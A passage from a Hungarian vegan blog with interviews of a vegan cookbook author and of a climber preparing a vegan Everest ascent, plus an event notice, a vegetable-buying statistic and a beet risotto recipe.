feltétként, így megláthatják, hogy egy kis napfény, sötétség, és víz, milyen csodára képes. La V.: Ma még nem jellemző, hogy a vegán ételek népszerűek lennének idehaza, mégis sikerült bebizonyítanod, hogy helyük van a magyar gasztro-palettán. Önálló főzőműsorod van, internetes életmód magazinban jelennek meg a receptjeid. Hogyan sikerült elérned? Gréta: Hittel. Töretlen hittel, és kitartó munkával. Amikor rájöttem, hogy ez az életmód milyen csodálatos, azt éreztem, ezt azonnal el kell mondanom. Mindenkinek! Ahol csak tudtam beszéltem róla. Indítottam Facebook oldalt, blogot, weboldalt, később You Tube csatornát, még varsói otthonomban drága magyar barátnőm segítségével készítettük az első receptes videókat. Töretlenül informáltam és informálódtam. Ez a mai napig így megy. Bátor voltam, és sok mindent fel kellett adnom ahhoz, hogy ma itt lehessek. Nincsenek befolyásos ismeretségeim, média kapcsolataim. Egy nő vagyok, aki rájött valamire, és ezt szeretné megosztani másokkal is. A motivációm, a szeretet. Semmi másban nem hiszek csak abban, hogy ha van egy célod, amit a szeretet motivál, akkor bármit elérhetsz. Csak ne add fel. Soha! La V.: Ez év márciusában jelent meg első könyved Gréta konyhája címmel. Százötven vegán recept mellett életvezetési tanácsokat is tartalmaz. Miért tartottad fontosnak, hogy ne csak szakácskönyvet adj az érdeklődők kezébe? Gréta: Egyszerűen azért tartottam fontosnak, hogy ne csak pusztán szakácskönyv legyen, mert amikor én a vegánság útjára léptem, hálás lettem volna egy ilyen könyvért, amely kézzel fogható hasznos tanácsokat ad nekem amellett, hogy számos ötletet is kapok, hogyan lehet gyorsan, erőszakmentesen finom, és egészséges ételt varázsolni az asztalunkra. Tudatni akartam azt is, hogy a vegánság nem egy diéta, egy divat, vagy egy hóbort, ahogy sokan hiszik, hanem egy komplex, és varázslatos életforma, amellyel nemcsak önmagunkhoz, hanem másokhoz is visszatalálhatunk. A boldogság, és egészség kulcsa nem csak az, hogy mit eszel, és mennyi értéket halmozol fel, hanem abban rejlik, hogy te mennyit tudsz adni. Szerettem volna, ha az olvasók megértik, hogyan, milyen motívumok mentén válik, válhat valaki növényevővé, és ha a változás útjára lép, hogyan tud rajta maradni. La V.: Engem meggyőztél, most már csak az a kérdés, hogy ha rendelek egy példányt, akkor kaphatok bele dedikálást, hogy személyesebb legyen? Gréta: Természetesen. Mindenki személyre szóló dedikált példányt kap, aki megrendeli. La V.: Legyél most néhány kérdés erejéig a személyes tanácsadóm. Tegyük fel, hogy eddig vegyes étrenden éltem, de elhatároztam, hogy teljesen felhagyok az állati eredetű ételek fogyasztásával. Üresnek érzem a bevásárló kosaramat, mert kikerültek belőle az állati eredetű élelmiszerek. Milyen alapanyagok kerüljenek a bevásárlólistámra? Egyáltalán milyen zöldségeket, gyümölcsöket vásárolhatok télen? Gréta: A könyvben az olvasó, bevásárló listával is találkozhat. A lényeg, hogy táplálkozása legalább 50%-a nyers, szezonális gyümölcs-zöldség-zöld leveles növény legyen. A hűtőmbe, spájzba benézve mondom most, legyen otthon mindig növényi tej, tejszín, joghurt, mert ezekkel változatos édességeket, habarásokat, pudingokat, saláta önteteket lehet készíteni. Szójából a fermentáltat részesítse előnyben, ilyen a szójaszósz, a tofu. Cukorból és lisztből száműzze a fehéret. Gabonákból komplexitásuk, és tökéletes húspótló hatásuk miatt a kölest, a hajdinát, a quinoát és a barna rizst együk. Mindig legyen otthon búzasikér, amelyből ízletes szejtánt (búzahúst) tudunk készíteni olcsón, házilag. Legyen otthon dió, mogyoró, aszalt gyümölcsök, egy-két csomag durum tészta, és a tojást kiválóan helyettesítő csicseriborsó, vagy bármilyen hüvelyesből készült liszt. Ínyencek és korábbi húsfüggők beszerezhetnek maguknak változatos gabonakolbászokat, növényi virsliket, pástétomokat és növényi pecsenyezsírt is. De ha nálam van otthon avokádó, én már boldog vagyok. Télen fogyasszunk sok almát, céklát, kel-, sima-, és savanyú káposztát, édesburgonyát, sütőtököt, karalábét és gyökérzöldségeket, melegítő fűszereket, chilit, gyömbért, fahéjat, és melegítő gabonákat, kölest, hajdinát, vagy zabot. La V.: Itt van előttem egy halom vegán alapanyag. Milyen konyhai eszközökkel tudom megkönnyíteni a feldolgozásukat? Gréta: Egy turmixgép mindenképpen ajánlott, nagyobb beruházásra nem lesz szükség. Érdemes olyat választani, amihez van aprító is. Gépek közül sokat használom a botmixert, a kávédarálót, és kell egy nagyon jó minőségű tapadásmentes serpenyő. Nem árt, ha van egy éles kés, egy jó hámozó, és egy wok is nagyon hasznos lehet. La V.: A neten vegán gasztroblogokat olvasok, nézem a főzővideókat, de egy vidéki kisvárosban élek, van esélyem beszerezni az olyan alapanyagokat, mint például a növényi tejek, sajtok, joghurt, tejföl, szejtán vagy az én konyhámban elmarad a vegán forradalom? Gréta: Nyíregyházán élek, az is vidéki kisváros. Sok főzőtanfolyamot tartottam már kisebb vidéki városokban is, és soha nem volt gond beszerezni az alapanyagokat. Igaz néha ,,vadászni kell a jó akciókat, de megéri. Talán eleinte több időt vesz igénybe a dolgok felkutatása, de ha egyszer megvannak, akkor célirányosan kell vásárolni. Mi a helyi Kosárközösségből vásároljuk a gyümölcsöt-zöldséget. A tejtermék és húspótlókat, pedig nagyáruházakban szerezzük be, amelyek minden kisvárosban vannak. Ezek közül szinte mindnek van bio részlege. Annak aki vegánná válik, azt tanácsolom, hogy csatlakozzon közösségi oldalakhoz, fórumokhoz, ha elakadna, ezeken a platformokon, sok lelkes segítőre lelhet. La V.: Szeretnék fincsi vegán sütiket készíteni, de fogalmam sincs hogyan pótoljam a hagyományos receptekben lévő tojást. Vannak erre bevált ötleteid? Gréta: A könyvben külön részleget szenteltem ennek a témának, de nem fért minden bele, ezért az ingyenes letölthető e-bookba került, ahol sok-sok más tipp és ötlet található. A leghasznosabb tanács, mit adhatok, hogy egyszerűen hagyd ki a süteményből a tojást. De ha mégis kipróbálnád a tojáspótlást, íme, néhány hasznosság: kötőanyagként térfogatnövelőként fasírtokba, vagdaltakba, töltelékekbe használhatsz csicseriborsólisztet, sárgaborsólisztet, őrölt lenmagot vízzel elkeverve, kukoricalisztet, étkezési keményítőt, bio zabpelyhet (finomra őröltet), élelmiszer allergia szaküzletekben készen kapható tojáspótló port is találsz, amit a leírás szerint kell elkészíteni. Panírozás esetén 2-3 evőkanál kukoricakeményítő és 6-7 kanál szójatej pici sóval összeturmixolva, tökéletesen helyettesíti a tojást. Sütéshez (térfogatnövelésre) a süteményekbe annyi evőkanál almaecetet keverj, amennyi tojás kellene bele. Egy egész tojást pótol 1 evőkanál őrölt lenmag, 3 evőkanál forró vízzel elkeverve, vagy 2 evőkanál víz, 1 evőkanál olaj, 2 teáskanál sütőpor összekeverve. Egy tojásfehérje helyettesítéséhez elegendő 1 evőkanál ízesítetlen agar-agar, 1 evőkanál vízbe feloldva, felverve, lehűtve, majd újra felverve. További tojáspótló anyagok az útifűmaghéj, valamint a banán összetörve. Lepényekhez, rántottába használj tofut, vagy selyemtofut (1 tojás, kb. 3 dkg tofu, vagy 3 dkg selyemtofu, összeturmixolva), és csicseriborsólisztet. La V.: Közeleg a karácsony, hazautazok a szülői házba, ahol az ünnepi asztal jó eséllyel a hagyományos húsos ételektől roskadozik majd. Hogyan hidalhatom át a szakadékot, ami a család ékezési szokásai és a személyes meggyőződésem között van? Gréta: Úgy, hogy felajánlod, idén te készíted az ünnepi menüt. La V.: Tudnál valami igazán klassz, gyorsan elkészíthető vegán karácsonyi ételt ajánlani, amivel megkínálhatom a családomat? Gréta: Imádom az édesburgonyát, mindenféle formátumban készítettem már, de csak nemrég fedeztem fel az alábbi receptet, amely tökéletesen helyettesítheti az egészségtelen hagyományos-majonézes krumplisalátát. Gyors, és isteni! Édesburgonya saláta pisztáciával, hozzávalók: - 4 db friss édesburgonya meghámozva, felkockázva - 1 szál újhagyma, vagy póréhagyma, apróra vágva - 1 csokor friss petrezselyem apróra vágva - 1,5 dl szójajoghurt - 1 1 tk dijon mustár - 1 ek rizsszirup - 1/2 citrom leve - só, bors, vegamix - olívaolaj - 10 dkg pisztácia A sütőt előmelegítjük 180 fokra, egy tepsit kibélelünk sütőpapírral, és eloszlatjuk rajta a kockákra vágott édesburgonyát. Meglocsoljuk olívaolajjal, és megszórjuk vegamix-szel. 25 perc alatt készre sütjük, majd hagyjuk kihűlni. Ezalatt egy tálba rakjuk az öntet hozzávalóit, jól összekeverjük, majd beleszórjuk a hagymát és a petrezselymet. Ha az édesburgonya kihűlt, hozzáadjuk az öntethez és alaposan összeforgatjuk. Tálalás után tetejét megszórjuk pisztáciával, de adhatunk hozzá aszalt áfonyát is, nagyon jól harmonizál. La V.: Van lehetőségem arra, hogy megtanuljam az alapfogásokat nálad egy főzőtanfolyam keretében, vagy esetleg többet is megtudjak a vegán életmódról egy előadáson? Gréta: Mostanában házi főzőtanfolyamokat tartok, 6-8 ember, általában barátok összejönnek, és együtt főzünk, ez mindig más konyhájában történik, egyelőre keressük az állandó helyet. Ha valaki követi a Facebook oldalamat, akkor minden információt megtalál, mikor és hol mit tartok. Vannak nagyobb városi rendezvények, televíziós műsorok, előadások, és tervben van egy ételkiszállítás is, nagyon rövid időn belül. Szeretem a személyes kapcsolatot, de ha valakinek kérdése van, e-mailen is elér (gretakonyhaja@postr.hu, info@gretastohr.com), igyekszem válaszolni. La V.: Arról nem beszéltünk még, hogy milyen terveid vannak a jövőt illetően, illetve milyen további fórumokon követhetjük a veled kapcsolatos eseményeket? Gréta: Terveimben szerepel egyelőre ételkiszállítás, és catering, kicsit távolabbi célom, pedig egy étterem, illetve később egy étteremlánc. A Lifenetwork adón jelenleg napi hat alkalommal mindenki megtekintheti az 5 perces minivideóimat, amelyek reményeim szerint tovább bővülnek majd, illetve fix helyet, és hosszabb műsoridőt kaphatnak a csatornán. A Facebookon mindenki megtalál, és kedve szerint követheti a velem kapcsolatos eseményeket, illetve napi recept és életmódtippeket, hasznos cikkeket, és videókat találhat. A life.hu vegán életmód szakértőjeként, pedig országosan is megismerhetik receptjeimet, szemléletmódomat, és ott is lehetőségük van az olvasóknak velem kapcsolatba lépni, illetve kérdéseiket feltenni. Végső célom pedig egy boldog és erőszakmentes világ alapjainak, szemléletének úttörőjévé és példaképévé válni, ahol mindenki szabadon, és félelem nélkül megélheti azt, amiért valóban erre a világra született. La V.: Kedves Gréta, sok hasznos információt, és tippet adtál mindannyiunknak. Köszönöm az interjút! Gréta: Én köszönöm!
Beszélgessünk személyesen a VEGETÁRIÁNUS GYEREKEKRŐL és a VEGÁN KARÁCSONYRÓL!
Gyere, találkozzunk és beszélgessünk személyesen!:) Meg lehet-e valósítani ma Magyarországon a vegetáriánus/vegán gyereknevelést? Mik az előnyei, milyen nehézségek léphetnek fel közben, amikkel a szülőknek szembesülniük kell? Vegán kismama, szoptatós anyuka, kisgyerek és nagyobb gyerek:) SZEMÉLYES BESZÉLGETÉS Nesztler Judittal a Vegagyerek blog szerzőjével (én lennék:DD) a Vega Baráti kör szervezésében. Másik témánk pedig a VEGÁN KARÁCSONY. Hogyan állítsuk össze a menüt, ötletek, javaslatok, és utána személyes tapasztalatcsere.:) IDŐPONT: 2013. DECEMBER 9. (HÉTFŐ), 18-20H Helyszín: Magnet Közösségi Ház, Andrássy út 98. A belépés INGYENES! GYERTEK - GYERTEK - GYERTEK! Minél többen, nagyon örülnék NEKED is!:) Viszek sütit is!;) Köszönöm, ha megosztod!
A vegán, aki a csúcsra tör
2013. december 2. La Veganista
Ez az első poszt, ami átlépi Magyarország határait, és egyenesen a csodálatos Indiába repít bennünket, hogy egy különleges emberrel ismerkedjünk meg. A La Veganista blog követői a világon először olvashatnak exkluzív interjút Kuntal Joisherrel, aki a Mount Everest meghódítására készül. Sokan próbálják elérni a legmagasabb csúcsot, de mitől olyan különleges Kuntal? Nos attól, hogyha sikerül neki, ő lesz az első vegán, aki, a világ tetején áll majd. Ez a nem mindennapi teljesítmény jó néhány előítéletet lerombolhat. Kuntal nem csak az előtte álló hatalmas kihívásról beszél, hanem arról is, hogyan változtatta meg életét a veganizmus. A posztot rendhagyó módon angolul is elérhetővé tesszük, hogy ne legyen nyelvi akadálya e nagyszerű erőpróbáról szóló hír elterjedésének. La V.: Kuntal, mindenekelőtt beszélj magadról, honnan jöttél, milyen háttérrel rendelkezel? Kuntal: 34 éves vagyok, Indiában, az álmok városában, Mumbai-ban élek. A Mumbai Egyetemen Számítástechnikai Mérnök diplomát szereztem, majd Los Angelesben az USC-n (University of Southern California) Számítási Tudományokból diplomáztam mesterfokon. Szeretem a szoftver programozást, a problémamegoldást, imádom a hegymászást, a gyalogtúrákat, a természetben lenni - és mondanom sem kell, imádok utazni, fotózni. Vegán vagyok, feminista, és ateista, szeretek progresszív rockzenét hallgatni, és nem utolsósorban igazi mozirajongó vagyok. La V.: Sok magyar hajlamos azt gondolni, remélni, hogy Indiában mindenki, de legalábbis nagyon sokan vegetáriánusok, vagy vegánok. Igaz ez a feltételezés? Kuntal: Vegetáriánus igen, de távolról sem vegán. Egy kezemen meg tudnám számolni, hány vegán van Mumbai-ban, amely a világ legnagyobb városa a maga 20 millió lakójával. Mi vagyunk a világ legnagyobb vegetáriánus országa, a vallás nagy szerepet játszik ebben a tekintetben. Azonban nagyon szomorú, hogy a legtöbb vegetáriánus nem ismeri az összefüggést a tej, a bőr, és a kegyetlenség közt. La V.: Milyen személyes motivációd volt arra, hogy vegán legyél? Kuntal: Vegetáriánus családba születtem, vegetáriánusként nőttem fel. Azonban a vallás okán voltam vegetáriánus és nem a saját döntésem alapján. Nem ettem volna meg a tojást közvetlen, például omlett vagy főtt tojás formájában, ugyanakkor, ha csokoládéban szerepelt összetevőként, boldogan megettem. Azt hiszem, ez a kényelem, az íz, és mindenekelőtt az állati jogok iránti közömbösség kombinációja volt. A veganizmussal akkor ismerkedtem meg, amikor Los Angelesbe költöztem 2001-ben, hogy folytassam a tanulmányaimat. Az egyik egyetemi szobatársam etikus vegán volt. Ő mutatta meg nekem a tej és a bőripar borzalmait. Ez volt az első alkalom, hogy összekapcsoltam a tejet a hússal, és rájöttem, hogy bizonyos tekintetben sokkal rosszabb, mint a hús. Az egész tejipar egy ördögi kör, mely az állatokkal szembeni súlyos kegyetlenségekből áll. Aztán hívott a tofu, és vegán lettem. Elajándékoztam a bőr és gyapjú holmijaimat, a lakásomhoz közel élő hajléktalan férfinek, a napi használatban lévő termékeket vegán változatukra cseréltem, és felhagytam a nem vegán ételek fogyasztásával. Életem következő néhány hónapja kisebbfajta harc volt, de összevetve azzal, hogy minden évben állatok milliárdjait bántalmazzák és ölik meg, az én szenvedésem jelentéktelen átállási fázis volt. Ez volt az első alkalom, hogy egy fontos ügy mellé álltam, és ez elindította bennem a változást. Képes voltam végre megszabadulni néhány durva dologtól. A következő néhány évben ki tudtam söpörni az életemből az olyan dolgokat, mint a homofóbia, a rasszizmus, a szexizmus. Ezek az önelemző évek életem leggyümölcsözőbb szakaszát jelentették, és ezek tettek azzá, aki ma vagyok, és az egész úgy kezdődött, hogy kiálltam az állatokért. A legfontosabb dolog, hogy teljesen elfogadtam magam. Letojom, hogy mások mit gondolnak rólam. Az teszem, amit szeretek, amiért lelkesedem, kiállok azért, amiben hiszek, az elmém nyitottá vált az új eszmékre, a tanulásra, és mindenekelőtt nagyon pozitívan állok az élethez. Ez tehát röviden az én vegán történetem. Közel tizenegy éve vagyok vegán, csodálatos utazás volt. Nagyszerű lenne a világ tetején egy vegán zászlóval a kézben köszönetet mondani annak az ügynek, amelyik megváltoztatta az egész életemet. La V.: Van rólad egy kép a Facebookon, ami nemrég készült a nepáli Island Peak csúcsán. (6189m - Everest alaptábor) Egy táblát tartasz a kezedben a következő szöveggel: ,,Vegán. 60 milliárd állat lájkolja őket. Miért tartottad fontosnak, hogy magaddal vidd? Kuntal: A legtöbb ember (köztük sok hegymászó) úgy gondolja, hogy a hús és a tejtermékek elengedhetetlenek a sikeres hegymászáshoz. Én mindenek felett szeretném eloszlatni ezt a mítoszt, megmutatni a világnak és arra inspirálni, hogy a hegymászás egészséges, teljes értékű vegán ételekkel is kivitelezhető. Kuntal Joisher az Island Peaken La V.: Mindenkinek van egy Mount Everest az életében. Lehet ez egy sorsfordító döntés, vagy egy betegség, amit túlél és megváltoztatja az életét. A Földön élő sokmilliárdnyi emberből viszont csak néhány van, aki a valóban leghatalmasabb hegyről álmodik. Te mióta álmodsz a Mount Everestről és miért akarod meghódítani? Kuntal: Tinédzserként láttam a PBS Nova Everest című dokumentumfilmjét, és lenyűgözött a hegy. Akkor fogant meg a gondolat. Fogalmam sem volt, mi kell ahhoz, hogy felmásszak a világ tetejére. Csak ott akartam állni a világ tetején! Ilyen egyszerű az egész. Nem volt szándékomban szenvedélyesen hegyet vagy sziklát mászni. Akkoriban nem is igazán értettem mit jelent a szenvedély, és az sem tudtam, hogy a hegymászás szó létezik. Boldogan elvoltam a barátaimmal és a krikettel, csak ez érdekelt. De a félelmetes Khumbu gleccserről készített felvételek és a Lhoce csodálatos 914 méternyi jégfala benne maradt valahol a tudatalattimban. Egészen 2008-ig, amikor az engem mindenben támogató feleségemmel lehetőségem nyílt egy himalájai utazásra, ahol télen megmásztunk egy kisebb csúcsot, a Hatu Peaket. Ez volt a fordulópont. Attól a naptól kezdve többé nem néztem vissza. Ekkor újra felfedeztem, hogy a Mount Everest megmászása az álmom, és úgy döntöttem, hogy keményen edzeni kezdek, hogy megvalósíthassam. És most itt vagyok, készen állok, hogy megvalósítsam az álmomat. Ami a Mt. Everest meghódítására vonatkozó kérdésedet illeti - szeretnék rámutatni arra, hogy soha nem hódíthatunk meg egy hegyet. Inkább a hegy az, aki engedi, hogy megmásszuk, és a csúcsára álljunk. Szeretném felidézni Sir Edmund Hillary szavait: ,,Nem a hegyet hódítjuk meg, hanem magunkat. Sokszor elgondolkodtam ezen, de nincs megfelelő válasz a miértre. Nem lenne tisztességes kitalálnom egy választ, csak hogy mondjak valamit. Nem tudom szavakba önteni, miért. Talán Scott Jurek (híres vegán vasember) szavai válaszolhatnának a kérdésedre: ,,De minél tovább és tovább futottam, annál inkább rájöttem arra, hogy amit addig kergettem, az egy lelkiállapot, egy hely, ahol az addig monumentálisnak hitt aggodalmak feloldódnak, ahol a világegyetem és a jelen pillanat szépsége és időtlensége kerül éles fókuszba." A Mount Everest látképe a Pumori Alap tábor melletti kisebb csúcsról Fotó: Kuntal Joisher La V.: Magyarország legmagasabb pontja a Kékestető, a maga 1014 méterével. Nem csoda, ha a magyar hegymászók időről-időre próbálkoznak a legmagasabb csúcs meghódításával. Az ő beszámolóikból tudjuk, hogy milyen emberfeletti teljesítmény kell hozzá. Te hogyan készülsz? Van speciális fizikai és mentális tréninged? Kuntal: Minden évben sokat túrázom a környező hegyekben, néhány hegymászó expedícióval kombinálva, így készülök a 2014-es Mt. Everest kihívásra. Rájöttem, hogy a hegymászással lehet a legjobban felkészülni a hegymászásra. Ugyanakkor megértettem, hogy a Mount Everest megmászása egyike a legkeményebb fizikai kihívásoknak, ezért életem legjobb fizikai és mentális állapotát kell elérnem. Sok kardio-vasculáris (szív és érrendszer) edzést végzek, például futok vagy kerékpározok, amit erő és nyújtó edzésekkel kombinálok otthon. Ezek meglehetősen egyszerű gyakorlatok. Egy tipikus edzés állhat húzódzkodás, fekvőtámasz, guggolás, plank keverékéből, alapvetően egyszerű dolgokból, helyes technikával és testtartással. Nemrég kezdtem el használni a TRX Suspension Trainert az edzéseimhez, ami csodát tett az erőnlétemmel. Az a nagyszerű a TRX-ben, hogy segít fenntartani a jó testtartást. A törzsizmok nagyjából minden TRX-szel végzett gyakorlatban részt vesznek. Ismétlem, nagy híve vagyok a KISS koncepciónak (Keep It Simple Stupid), vagyis Egyszerűen, te hülye. Csináld helyesen a legalapvetőbb, legegyszerűbb gyakorlatokat. Ez az én mantrám. La V.: A mindenevők talán azt gondolják, hogy serpák százai szállítják a salátás kosarakat a csúcstámadó vegán hegymászó után. De térjünk vissza a realitáshoz. Van különleges táplálkozási terved erre a hatalmas kihívásra? Szedsz bármilyen táplálékkiegészítőt? Kuntal: Az étrendem nagyon egyszerű - teljes értékű növényi alapú élelmiszerek. Imádok gyümölcsöket, zöldségeket, hüvelyeseket, magvakat enni, és ez a diéta csodát tett velem. Bármilyen nehéz gyakorlatot végzek, gyorsabban regenerálódom tőle. Másrészről viszont rájöttem, hogy amikor egészségtelen dolgokat eszem, mint például rántott ételek, fehér liszt, vagy fehér cukor, a regenerálódás sokkal lassabb. A szervezeted megmondja, mit kíván. Az én testem a teljes vegán ételeket szereti. Ugyanakkor ezt kombinálom különböző táplálékkiegészítőkkel: vegán D3 vitaminnal, vegán B12 vitaminnal és vegán Co-Q10-zel. Amikor a mindennapos edzésemet végzem, háromféle Vega kiegészítőt használok: az egyiket edzés előtti energetizálóként, a másik az edzés utáni regenerálódáshoz, a harmadik pedig egy adag vega proteinpor (Vega Pre-workout energizer, Vega Post-workout recovery, Vega Protein powder). La V.: A csúcstámadást jövőre tervezed. Nyilvánvalóan sokan támogatnak beleértve a családodat, a barátaidat és vegánokat, a világ minden tájáról. Lesz olyan weboldal, ahol követhetjük a küldetésed? Kuntal: A 2014-es Mount Everest mászással kapcsolatos információk felkerülnek majd az expedíció weboldalára, melyet a szponzorom hoz majd létre, ahogy a Facebook és a Twitter oldalakat is. Jelenleg még csak a Facebook oldal készült el. Tudatni fogom veletek, amint az expedíció honlapja is elkészül. Támogatóm, a CallFire Inc. egy FUEL nevű fantasztikus programot indított el. Remek lenne, ha meg tudnátok ezt osztani az olvasóitokkal. ,,Rettenthetetlen, egyedülálló, példaadó vezető. Ha a leírás illik rád, írj nekünk a fuel@callfire.com címre és mesélj a küldetésedről. Lehet, hogy segíthetünk neked. La V.: Mikorra tervezed az indulást? Kuntal: 2014. március 28. környékén indulok Mumbai-ból. Az azt követő 4-5 napot Katmanduban, Nepálban töltöm, hogy megszerezzem a szükséges felszerelést és elvégezzem a bevásárlást, elintézzem a dokumentációt, az engedélyeket, és gondoskodjam a logisztikai dolgokról. Miután ez megvan, a csapatunk elindul az alaptáborba. Nyolc nap alatt fogjuk elérni. Az azt követő egy hónapot mászással és akklimatizációval töltjük az alaptábor környékén, arra várva, hogy az időjárás lehetővé tegye a csúcsmászást. Amint ez lehetővé válik, körülbelül öt nap alatt érjük el a csúcsot. A visszaút 7-8 napot vesz igénybe, és utána hazarepülök Mumbaiba. Terveim szerint június első hetében érek haza. Ereszkedés a Mt Kun egyes táborából Fotó: Kuntal Joisher 10. La V.: Nem tudom, hogy szokás-e a világ tetején uzsonnázni, de ha megtehetnéd, mit vinnél magaddal az uzsonnás dobozban? Természetesen a salátás kosáron kívül. Kuntal: Hogy őszinte legyek, az evés lesz az utolsó gondolatom a Mount Everesten. Több hegymászótól is hallottam, hogy a harmadik táboron túl a legtöbb ember alig eszik valamit. Az oxigén ebben a magasságban olyan alacsony, hogy a szervezet elvonja az emésztőrendszertől. Ezen a ponton már minden másnál fontosabb a szív és az agy egészsége. Ahogy mondtam, egy Vega One szeletet kívánok magammal vinni a csúcsmászó napon. Ez rost, fehérje, szénhidrát és Omega 3 nagyszerű keveréke, és egy adag zöldség egyetlen szeletben. Természetes, egészséges és ízletes is. Ezen kívül még egy tábla kiváló vegán étcsokit is viszek. Van esetleg valami, amit ti vagy az olvasóitok ajánlanának, hogy magammal vigyek? 11. La V.: Ha sikerül, te leszel az első vegán, aki a világ tetején áll majd. Ez a nagy bravúr fel fogja kelteni a világ érdeklődését. Tudom, hogy fel szeretnéd hívni az emberek figyelmét valamire. Milyen ügy mellé állsz? Kuntal: Két ügyre szeretném felhívni a figyelmet. Az egyik a demencia. Édesapám előrehaladott demenciában szenved. A családommal az elmúlt néhány évben hosszú érzelmi utat tettünk meg azért, hogy elfogadjuk apám állapotát. Első számú gondozóiként sokat tanulunk ebben az időszakban. Azért mászom, hogy felhívjam a figyelmet a demenciára, és megosszam azt, amit az elmúlt néhány évben tanultunk. Ezzel egy időben ott akarok állni a világ tetején, hogy apám büszke legyen rám. A másik ügy a veganizmus - ahogy már korábban említettem, szeretnék eloszlatni minden mítoszt, ami a vegán táplálkozással és életmóddal összefügg. Mi sem jobb erre, mint a világ tetején állva kikiáltani: ,,Mi, vegánok is meg tudjuk csinálni és stílusosan! 12. La V.: Nemcsak lelkes hegymászó vagy, de csodás képeket is készítesz utazásaid során. A legmeghatóbb számomra a ,,Pásztor és a borjú volt, mely 2013. január 13-án a nap képe volt a National Geographic magazinban. Mi a kép története? Kuntal: Úgy történt, hogy megálltunk a Nyugati-Ghatok hegyvonulatán, néhány kilométerre a Kaas fennsíktól. Sétálni indultam, hogy élvezzem a zöldellő növényzet és a csúcsok csodálatos látványát. Hirtelen belefutottam egy csapatnyi legelésző tehénbe és borjúba. A pásztor a közelükben heverészett. Készíteni akartam egy képet a legelésző tehenekről a Ghatokkal és a gáttal a háttérben, ezért óvatosan elindultam feléjük. Az egyik fiatal üsző nagyon ideges és óvatos lett. A jelenlétemet érezve egyre közelebb húzódott számára biztonságot jelentő pásztor atyjához. Ami ezután történt, teljesen megdöbbentett. A borjú megpróbálta felkelteni a pásztor figyelmét. A pásztor egy pillanatra felébredt, rám nézett, majd újra elszunnyadt, de nyitott tenyerét kinyújtotta a borjú felé, mintha azt intette volna neki: ,,Itt vagyok, ne aggódj. Erre válaszul a borjú gyengéden, tiszta, hamisítatlan szeretettel megnyalta a kezét. A jelenet megdöbbentett és valósággal megbabonázott. Szerencsére, képes voltam megörökíteni a pillanatot, és ma is, ha erre a képre nézek, elámulok. Az egyetlen dolog, ami eszembe jut róla az, hogy ,,a szeretet nem ismer színt, hitet, rasszt, nemet vagy fajokat... A szeretet nem ismer színt, hitet, rasszt vagy fajokat Fotó: Kuntal Joisher La V.: Biztos vagyok abban, hogy a La Veganista blog olvasói, szívesen hallanának a mászást követően a tapasztalataidról. Lehetséges volna ez? Kuntal: Abszolút. Szeretném veletek megosztani a tapasztalataimat a mászást követően. La V.: Nagyon köszönöm az interjút! Sikeres mászást kívánok! Vegan Power! Kuntal: Köszönöm! Örömmel válaszoltam a kérdéseidre, és remélem, egészséges és erőszakmentes életre biztatom az olvasókat, valamint arra, hogy tegyék azt, amit igazán szeretnek, éljenek a szenvedélyüknek.
GfK: Ezekből a zöldségekből veszik a legtöbbet a magyarok
A legtöbb - tízből jellemzően nyolc - háztartás által vásárolt zöldségek listáját a paprika, paradicsom, hagyma, répa és burgonya vezeti. Uborka és káposzta tízből hét háztartás kosarába kerül. Szegény gomba mellett hiába kampányoltak, csak minden második háztartás vesz belőle.
Vadászat a vörös rizottóra
Több, mint tízezer halálos áldozat, mintegy százezer hajléktalan, az alapellátás kritikusan teljesíthető, élelem- és vízhiány jellemzik a Magellán által 1521-ben felfedezett szigetcsoportot napjainkban. Az elmúlt 72 órában a világ szeme Fülöp-szigetekre összpontosult, ahol a Haiyan tájfun elképzelhetetlen pusztítást okozott. Becslések szerint, legalább 4 millió lakost érintett a természet erőinek rombolása. Arról nem találok semmi tájékoztatást, hogy mi lett a rizsföldekkel, rizsteraszokkal, amelyek a világörökség részéhez tartoznak az Ifugao-hegység -ben. Kamaszkoromból egy régi ismerősöm észak-Magyarországról, egy fülöp-szigeteki lányt vett el. Szerencsére ma már családjával együtt Shanghaj-ban élnek rövid ideje. Ők minden bizonnyal közelebbről is ismerik a rizsföldeket, a rizstermesztés csinnyát-binnyát, Fülöp-szigeteken eltöltött éveknek köszönhetően. "A világ rizstermésének mintegy fele olyan földekről származik, amelyeket teljes egészében kézi erővel művelnek meg. A rizsföldekre 4 hetes előnevelt rizspalántákat ültetnek ki. A rizs ezután 90-260 napig növekszik, majd a virágzást követően 30 nappal érnek be a szár csúcsán hosszú ágú bugában fejlődő szemtermései. Az ázsiai hagyományos művelés során az asszonyok ültetik és gyomlálják a rizst, a férfiak pedig a talaj előkészítést és az elárasztással kapcsolatos munkákat végzik. A rizsföldek ideális igaállata a vízibivaly volt - sőt még a mai napig is az, egyrészt kiváló igavonó állat, másrészt trágyázza a földeket." (Ötven növény, amely megváltoztatta a történelmet) A fent leírtakra bizonyára nem is gondolunk, amikor elővesszük az éléskamránk polcáról a rizst, hogy különböző finom ételeket készítsünk belőle. Céklával párosítva rizottó készült belőle még októberben. Így lett vadászat a vörös októberre, jobban mondva rizottóra. ;) Rizsültetést végez egy magyar férfi a fülöp-szigeteki asszony segítségével. Teraszos rizsföldek A recept: Hozzávalók: 6-8 szem cékla meghámozva és felkockázva 2 marék rizs (nálam barna a nyerő) só kevés őrölt köménymag 3-4 gerezd fokhagyma kurkuma 2 dl növényi tej sörélesztő-pehely (opcionális) újhagyma (opcionális) Elkészítés: Az alaplevet a rizottóhoz egyszerűen elkészítjük. A fokhagymákat kisebb darabokra vágjuk, sót, és kurkumát adunk hozzá (ez festi sárgára, de használhatunk helyette sáfrányt is), ezt rövid idő alatt összefőzzük kb. 3-4 dl vízzel. (Épp, hogy kicsit forrjon.) Míg felforr, a rizst átmossuk, megpirítjuk (teflon bevonat esetén nem kell olaj, vagy kókuszzsír). Majd az alaplével felöntjük a rizst. Ha szükséges, még tehetünk hozzá kurkumát. Szép sárga színt ajándékoz neki. Míg a rizs fő, egy kevés vízen, némi sóval vagy ételízesítővel megpároljuk a felkockázott céklákat, majd felöntjük növényi tejjel és szintén némi felaprított vagy összenyomott fokhagymát adunk hozzá. Amikor a rizs már puhul, az utolsó 10 perc főzésre összekeverjük a zöldséget a rizzsel. Amennyiben szükséges, még sózhatjuk. Tálalásnál sörélesztő-pehellyel és újhagymával kínálva még ízletesebbé tehetjük.
Az a bűvös B 12 vitamin és a vegán életmód...
